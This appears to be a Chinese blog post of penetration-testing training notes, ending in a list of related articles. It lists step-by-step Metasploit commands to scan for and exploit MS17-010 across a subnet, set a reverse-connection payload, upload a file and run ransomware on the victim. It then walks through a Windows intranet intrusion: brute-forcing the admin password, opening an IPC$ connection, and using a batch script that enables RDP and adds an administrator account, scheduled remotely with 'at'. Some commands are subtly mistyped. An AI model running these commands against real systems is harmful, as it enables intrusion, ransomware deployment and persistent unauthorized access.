网络安全实训Day16

网络空间安全实训-渗透测试

漏洞扫描

  • 定义

    • 扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞
  • 漏扫工具

    • AWVS

    • APPScan

    • MSF

复制代码
### 使用MSF扫描漏洞并利用

* 1.搜索需要的攻击模块

  * search ms17-010

* 2.使用攻击模块

  * use 模块名称

* 3.设置扫描范围

  * set rhosts 192.168.12.0/24

* 4.设置扫描线程

  * set thread 50

* 5.开始扫描

  * run

* 6.更换攻击模块为漏洞利用

* 7.查看可用攻击载荷

  * show payloads

* 8.设置攻击载荷

  * set payload 攻击载荷名称

* 9.设置被攻击主机IP地址

  * set rhost IP地址

* 10.设置反向连接的控制机IP地址

  * set lhost IP地址

* 11.开始攻击

  * run

* 12.上传病毒

  * upload 本地文件路径 远程主机路径

* 13.执行勒索病毒

  * execute -f 勒索病毒路径

Windows内网渗透

复制代码
#### 1.扫描对方操作系统和开放的端口

* 确定对方是Windows系统开启了445接口
复制代码
#### 2.针对该端口服务暴力破解Windows管理员账号密码
复制代码
#### 3.与对方建立空连接

* net use \\\\对方ip地址\\ipc$

* 需要输入对方的管理员账号密码
复制代码
#### 4.制作开启RDP和创建管理员账户的脚本bat

* REG ADD "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

* net user 用户名 密码 /add

* net local group administrator 用户名 /add
复制代码
#### 5.访问对方C盘默认共享,将bat复制到对方C盘

* 在文件资源管理器地址栏中输入 \\\\对方IP地址\\c$
复制代码
#### 6.查看对方的系统时间

* net time \\\\对方IP地址
复制代码
#### 7.给对方创建任务计划,定时执行BAT程序,开启RDP

* at \\\\对方ip地址 时间 执行的文件路径
复制代码
#### 8.使用先前创建的管理员账号登陆RDP
相关推荐
东方隐侠安全团队-千里2 小时前
第13节 93年高能所被入侵,开启中国网络安全发展进程
网络·安全·web安全
摇滚侠2 小时前
Vue 项目实战《尚医通》,预约挂号的路由与静态搭建,笔记36
javascript·vue.js·笔记
三品吉他手会点灯2 小时前
STM32F103学习笔记-16-RCC(第4节)-使用 HSI 配置系统时钟并用 MCO 监控系统时钟
笔记·stm32·单片机·嵌入式硬件·学习
Lester_11013 小时前
嵌入式学习笔记 - 关于看门狗定时器的喂狗的操作放在中断还是放在主循环
笔记·单片机·学习
belldeep3 小时前
网络安全:SQL 注入:SQLmap
web安全·sql注入·sqlmap
AA陈超4 小时前
ASC学习笔记0017:返回此能力系统组件的所有属性列表
c++·笔记·学习·ue5·虚幻引擎
P***25394 小时前
免费的Web安全漏洞扫描,工具
安全·web安全
谅望者4 小时前
数据分析笔记07:Python编程语言介绍
大数据·数据库·笔记·python·数据挖掘·数据分析
Cathy Bryant5 小时前
信息论(五):联合熵与条件熵
人工智能·笔记·机器学习·数学建模·概率论
谅望者6 小时前
数据分析笔记03:概率分布理论
笔记·数据分析·概率论